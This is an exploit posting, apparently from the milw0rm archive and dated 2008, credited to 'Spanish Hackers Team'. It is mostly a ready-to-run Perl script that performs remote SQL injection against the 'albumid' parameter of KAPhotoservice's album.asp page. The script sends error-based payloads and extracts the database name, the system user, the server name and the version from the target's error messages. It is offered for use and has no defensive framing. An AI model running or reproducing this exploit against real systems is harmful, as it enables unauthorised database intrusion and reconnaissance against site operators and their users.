--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- --==+ KAPhotoservice (album.asp) Remote SQL Injection Exploit +==-- --==+====================================================================================+==-- [+] [JosS] + [Spanish Hackers Team] + [Sys - Project] [+] Info: [~] Software: KAPhotoservice (Payment) [~] Demo: http://www.kaphotoservice.com/photoservice/ [~] Exploit: Remote SQL Injection [High] [~] Bug Found By: JosS [~] Contact: sys-project[at]hotmail.com [~] Web: http://www.spanish-hackers.com [~] Vuln File: album.asp [+] Exploit: #!/usr/bin/perl # KAPhotoservice - Remote SQL Injection Exploit # Code by JosS # Contact: sys-project[at]hotmail.com # Spanish Hackers Team # www.spanish-hackers.com use IO::Socket::INET; use LWP::UserAgent; use HTTP::Request; use LWP::Simple; sub lw { my $SO = $^O; my $linux = ""; if (index(lc($SO),"win")!=-1){ $linux="0"; }else{ $linux="1"; } if($linux){ system("clear"); } else{ system("cls"); system ("title KAPhotoservice - Remote SQL Injection Exploit"); system ("color 02"); } } #*************************** expl ****************************** &lw; print "\t\t########################################################\n\n"; print "\t\t# KAPhotoservice - Remote SQL Injection Exploit #\n\n"; print "\t\t# by JosS #\n\n"; print "\t\t########################################################\n\n"; $host=$ARGV[0]; chop $host; $host=$host."/album.asp?cat=&apage=&albumid="; if(!$ARGV[0]) { print "\n[x] KAPhotoservice - Remote SQL Injection Exploit\n"; print "[x] written by JosS - sys-project[at]hotmail.com\n"; print "[x] usage: perl $0 [host]\n"; print "[x] example: http://host.com/PHPWebquest\n"; exit(1); } @comando=("1+and+1=convert(int,db_name())","1+and+1=convert(int,system_user)","1+and+1=convert(int,\@\@servername)--",'1+and+1=convert(int,@@version)--'); for ($i=0;$i<=3;$i++) { my $final = $host.$comando[$i]; my $ua = LWP::UserAgent->new; my $req = HTTP::Request->new(GET => $final); $doc = $ua->request($req)->as_string; if ( $doc =~ /Syntax\s(.*)<\/font>/mosix ) { if ($comando[$i] eq "1+and+1=convert(int,db_name())") { print "db_name:\n"; $dbname = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/); print "$dbname\n\n"; } if ($comando[$i] eq "1+and+1=convert(int,system_user)") { print "system_user:\n"; $systemuser = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/); print "$systemuser\n\n"; } if ($comando[$i] eq "1+and+1=convert(int,\@\@servername)--") { print "servername:\n"; $servername = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/); print "$servername\n\n"; } if ($comando[$i] eq '1+and+1=convert(int,@@version)--') { print "version:\n"; $version = $1 if ($doc =~ /.*?value\s'(.*?)'\sto.*/sm); print "$version\n\n"; } } # Cierre del if principal } # cierre for --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- --==+ JosS +==-- --==+====================================================================================+==-- [+] [The End] # milw0rm.com [2008-03-18]